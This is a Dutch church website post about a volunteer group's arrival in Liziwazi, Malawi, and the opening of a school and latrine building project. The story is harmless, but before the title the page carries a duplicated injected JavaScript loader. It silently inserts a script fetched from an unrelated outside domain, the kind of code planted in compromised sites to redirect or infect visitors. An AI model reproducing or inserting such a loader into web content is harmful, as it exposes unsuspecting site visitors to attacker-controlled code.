;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); MA419 | Afrikaanse swing tijdens de opening! - PKN Damwâld

MA419 | Afrikaanse swing tijdens de opening!

Gepubliceerd op: donderdag 15 augustus 2019

De groep is ondertussen ondergedompeld in de Malawiaanse cultuur. Ze zijn bewoners van Liziwazi voor de komende weken.

Leider Gerard neemt jullie kort mee naar de eerste dag: ‘Wij zijn gisteravond gearriveerd in het mooie Liziwazi, na een goede reis die lekker gesmeerd verliep. Vol enthousiasme zijn wij onthaald door de lokale bevolking. We hebben samen gedanst en gezongen hierna stond het eten voor ons klaar. Moe maar voldaan zijn we de eerste Malawiaanse nacht in gegaan. Vanochtend hebben we voor het eerst echt kunnen zien hoe mooi het uitzicht hier is en hoe prachtig deze omgeving is. Tis hier fantastisch en iedereen maakt het goed.??’ Check ook de vlog van de eerste dagen, video hierboven te vinden.

Nadat de groep is opgestaan stond de opening van de bouw op het programma. Bouwleider Bart Jan mocht samen met landcoördinator Mussa de officiële opening doen. Na verschillende speeches was daar het moment ‘de eerste steenlegging’. Met de lokale bevolking bouwt de groep klaslokalen en latrines. Op dit moment kunnen de kinderen uit het dorp alleen maar naar klas en 1 en 2 in Liziwazi. Voor hogere klassen moeten ze zes kilometer lopen naar een school in een ander dorp. Met het huidige klaslokaal dat gebouwd is van gras, is de school niet aantrekkelijk voor nieuwe leraren. Met de bouw van nieuwe klaslokalen, kan de overheid gekwalificeerde leraren toewijzen aan de Liziwazi. Dit vergroot de kwaliteit van het onderwijs en de kansen voor de jongeren op een betere toekomst. De latrines verbeteren de hygiëne en de verschoningsruimtes maken het voor meisjes mogelijk om ook wanneer ze ongesteld zijn naar school te blijven gaan.

Tijdens de opening was het zichtbaar dat de bevloking er veel zin in heeft en dat dit project veel voor hen betekent. Dit zorgde voor een mooie sfeer tijdens de opening waar de deelnemers duidelijk van genoten. Het bouwproject is nu dus echt van start!